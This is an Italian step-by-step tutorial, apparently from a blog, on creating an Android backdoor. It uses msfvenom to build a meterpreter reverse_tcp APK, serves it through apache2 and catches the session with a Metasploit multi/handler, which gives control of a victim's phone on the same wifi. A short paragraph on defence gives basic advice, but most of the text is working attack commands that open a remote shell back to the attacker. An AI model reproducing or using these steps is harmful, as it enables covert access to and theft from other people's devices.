In questa guida voglio mostrarvi passo-passo come accedere a uno smartphone Android connesso alla stessa rete wifi,con una backdoor, vi informo che questo metodo è un metodo molto vecchio, che permette attraverso la creazione di un virus informatico di accedere e avere il controllo di uno smartphone Android. Ovviamente la tecnica che viene mostrata è rilevata da moltissimi antivirus presenti in circolazione. Per eseguire questa procedura occorre essere in possesso di una distribuzione Linux con all’interno il software metasploit. Consiglio o Kali-linux o Parrot-Security. Se siete alla vostra prima esperienza e non sapete come avviare distribuzioni di linux vi consiglio di leggere questa guida> Installare Linux su USB.
Cos’è una backdoor?
In informatica la backdoor è un tipo di accesso a un sistema informatico che consente a un utente remoto o malintenzionato di agire di nascosto al dispositivo in uso. Nella maggior parte dei casi la backdoor viene sviluppata da uno sviluppatore con conoscenza di linguaggio di programmazione molto avanzate. La maggior parte dei casi le backdoor sono sviluppate in maniera del tutto invisibile ai comuni antivirus che possediamo noi oggi.
Come ci si può difendere?
Prima di tutto utilizzare il dispositivo che sia un computer o uno smartphone con le dovute precauzione, evitare di scaricare applicazioni da fonti non ufficiali come per esempio scaricate da internet, evitare di aprire link che possono sembrare sospetti, evitate di aprire email contenenti programmi o file da email che non provengono dai vostri contatti. Un altro consiglio non credete a tutto ciò che leggete all’interno di uno smartphone che sia un email o un semplice SMS, perché i criminali sono sempre dietro le porte di tutti e tentano di fregarvi in questo modo. Tenete sempre un antivirus aggiornato all’interno del dispositivo se possibile con antivirus con funzionalità avanzate come per esempio un antivirus a pagamento, certo non sempre può bastare però è sempre consigliato tenere un dispositivo comunque con le protezioni più adatte.
Installazione:
Il primo passaggio da effettuare una volta caricato il nostro sistema operativo e quello di aprire il terminale scrivere il seguente comando:
sudo ifconfig
Questo comando ci permette di sapere qual è il nostro indirizzo ip interno del computer in uso nel mio caso è il seguente: 192.168.0.133.
Sempre nel terminale ora dobbiamo andare a creare la backdoor quindi digitiamo:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.133 LPORT=4444 -o /home/kali/Desktop/payloads.apk
Nel vostro caso nel campo LHOST dovete specificare il vostro indirizzo ip.
-p sta a indicare il payload che andremo a scegliere nel caso nostro abbiamo scelto android/meterpreter/reverse_tcp
-o indica il percorso di destinazione della nostra backdoor, io lo chiamato payloads.apk ma il nome potete scegliere uno qualunque.
Come si può notare dall’immagine la backdoor risulta salvata nel desktop. Adesso occorrerà andare a installare la backdoor nello smartphone, per farlo utilizzeremo apache2 che è presente sia in kali che in parrot. Quindi ora nel terminale scriviamo:
service apache2 start
Adesso non ci resta che caricare la nostra backdoor nella cartella di apache2 per farlo occorre copiare la backdoor con questo comando:
sudo cp /home/kali/Desktop/payloads.apk /var/www/html/payloads.apk
Eseguito anche questo passaggio occorre ora aprire il terminale e avviare metasploit per farlo scriviamo questo comando:
sudo msfconsole
Successivamente scriviamo:
use multi/handler
Poi:
set payloads android/meterpreter/reverse_tcp
Poi impostiamo l’indirizzo ip e la porta precedentemente utilizzati:
set LHOST 192.168.0.133
set LPORT 4444
Successivamente avviamo l’exploit con il seguente comando:
exploit
Ora procediamo con l’installazione dell’applicazione sullo smartphone della vittima, per farlo occorre scrivere sulla barra degli indirizzi di navigazione il seguente comando:
http://192.168.0.133/payloads.apk
Inizierà a partire un download dell’applicazione, abilitate le sorgenti sconosciute, e installate l’applicazione, appena apriremo l’applicazione noteremo la sessione attiva sul terminale di metasploit.
Ora per aprire la sessione e iniziare a navigare all’interno dello smartphone occorre scrivere nel terminale:
session -l
Successivamente selezionare la sessione in esecuzione:
sessions -i 1
Ora scrivete help per vedere tutti i comandi da sfruttare nel terminale.